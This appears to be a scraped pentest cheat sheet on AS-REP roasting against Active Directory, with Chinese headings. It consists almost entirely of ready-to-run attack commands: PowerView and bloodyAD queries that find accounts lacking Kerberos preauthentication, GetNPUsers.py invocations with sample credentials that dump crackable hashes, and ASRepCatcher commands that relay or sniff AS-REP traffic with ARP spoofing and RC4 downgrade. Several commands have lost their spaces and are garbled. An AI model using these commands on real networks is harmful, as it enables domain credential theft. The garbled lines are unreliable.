Get-DomainUser-PreauthNotRequired-verbose#List vuln users using PowerView
使用Linux
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
请求 AS_REP 消息
使用 Linux
#Try all the usernames in usernames.txtpythonGetNPUsers.pyjurassic.park/-usersfileusernames.txt-formathashcat-outputfilehashes.asreproast#Use domain creds to extract targets and target thempythonGetNPUsers.pyjurassic.park/triceratops:Sh4rpH0rns-request-formathashcat-outputfilehashes.asreproast
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supportedASRepCatcherrelay-dc $DC_IP# Disabling ARP spoofing, the mitm position must be obtained differentlyASRepCatcherrelay-dc $DC_IP --disable-spoofing# Passive listening of AS-REP packets, no packet alterationASRepCatcherlisten